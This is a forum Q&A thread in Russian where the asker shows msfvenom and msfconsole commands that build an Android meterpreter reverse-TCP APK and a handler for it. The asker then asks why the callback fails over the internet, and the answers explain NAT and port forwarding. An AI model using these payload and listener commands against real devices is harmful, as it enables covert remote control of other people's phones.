Прежде всего, это мой первый пост, поэтому, пожалуйста, не игнорируйте это. Возможно, вы видели этот вопрос раньше. Прежде чем пометить это как дубликат, пожалуйста, поймите мои проблемы. У меня много вопросов. Я использую это в образовательных целях.

пожалуйста, обратите внимание на следующее:

  1. У меня нет роутера.
  2. Я установил Кали 2.0(сана).
  3. Я использую свой мобильный Android для подключения к Интернету через USB-модем.

Теперь я объясню, что сделано.

прежде всего я создал полезную нагрузку Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk

xxx.xxx.net - это мой не зарегистрированный ip-адрес (скрытый с x); тогда я успешно подписал его.

Теперь я отправил его на другое устройство Android через Bluetooth (поэтому IP-адрес моего устройства не изменился. Он также не подключен к локальной сети), тогда я успешно установил его.

Ifconfig:

# ifconfig
eth0      Link encap:Ethernet  HWaddr 78:24:af:bc:a8:a2  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1072 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:87360 (85.3 KiB)  TX bytes:87360 (85.3 KiB)

usb0      Link encap:Ethernet  HWaddr 42:c8:eb:7b:43:a9  
          inet addr:192.168.42.50  Bcast:192.168.42.255  Mask:255.255.255.0
          inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:20535 errors:21 dropped:0 overruns:0 frame:21
          TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11073420 (10.5 MiB)  TX bytes:3833297 (3.6 MiB)

Затем я открыл терминал.

# msfconsole


 _____________

msf > use exploit/multi/handler
msf exploit(handler) 
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 192.168.42.50
lhost => 192.168.42.50
msf exploit(handler) 
set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.42.50:4444 
[*] Starting the payload handler...

После того, как я открыл приложение на целевом мобильном устройстве, в терминале metasploit ничего не поступало.

Однако то же самое отлично работает по локальной сети. но когда дело доходит до интернета, это терпит неудачу. Я перепробовал почти все, что мог, но тщетно.

Я обнаружил, что порты открываются в локальном IP-адресе.

# nmap 192.168.42.50

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST
Nmap scan report for kali (192.168.42.50)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
4444/tcp open  krb524

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

но они закрыты в незарегистрированном DNS.

# nmap xxx.xxx.net

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST
Nmap scan report for xxx.xxx.net (a.b.c.d)
Host is up (0.22s latency).

rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in

Not shown: 990 closed ports

PORT     STATE    SERVICE

21/tcp   filtered ftp
53/tcp   filtered domain
80/tcp   open     http
111/tcp  open     rpcbind
443/tcp  open     https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
1723/tcp filtered pptp
3306/tcp open     mysql
8022/tcp open     oa-system

Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds

примечание: abcd - это разрешенный IP-адрес моего DNS

Так как именно я могу установить успешное соединение?

Если вы думаете, что этот вопрос не по теме или что-то еще, пожалуйста, предложите мне решение.

2 ответа2

0

Хорошо, позвольте мне ответить на этот вопрос, но сначала я перефразирую то, что я думаю, что вы пытаетесь достичь, чтобы убедиться, что я не неправильно понимаю вещи.

У вас есть система с Kali linux, которая получает доступ в Интернет через привязанный мобильный телефон USB, который обеспечивает адрес RFC1918 (т.е. не маршрутизируемый через Интернет) 192.168.42.50.

Вы настраиваете обратную оболочку Android с помощью metasploit, указав свой маршрутизируемый адрес в Интернете

Затем используйте exploit/multi/handler для прослушивания порта 4444 по локальному не маршрутизируемому адресу.

Проблема в том, что, хотя вы видите, что ваш порт прослушивает локальную локальную сеть, вы не можете видеть его с подключенного к Интернету устройства, когда доставляется полезная нагрузка.

Сканирование портов на маршрутизируемом адресе Интернета не показывает открытых портов.

-

Если предположить, что все правильно, то проблема в том, что вы не настроили "переадресацию портов" с интернет-адреса на локальный экземпляр metasploit.

Обычно это делается так: когда вы контролируете устройство, у которого есть Интернет-адрес на одном из его интерфейсов, вы указываете ему перенаправить порт 4444/TCP с этого интерфейса на вашу внутреннюю систему на 192.168.42.50.

Если вы можете настроить это, то, что вы описываете, должно работать. Если у вас нет доступа для создания "переадресации порта", то описанное вами не будет работать, поскольку целевой объект, использующий эксплойт в Интернете, не имеет к чему подключиться.

0

У вас есть роутер - ваш телефон. Ваш телефон проложен между 192.168. адреса и интернет-адреса. Дело в том, что вы не перенаправили порт на свой телефон. Это вероятно возможно, но это будет нелегко. Вам, вероятно, понадобится доступ с правами root и использование iptables. В этот момент вы, вероятно, захотите спросить на android.se, где вы, вероятно, получите лучший ответ.

Примечание: это звучит как проблема XY. Какова цель этого? Вероятно, есть лучший способ сделать то, что вы хотите.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .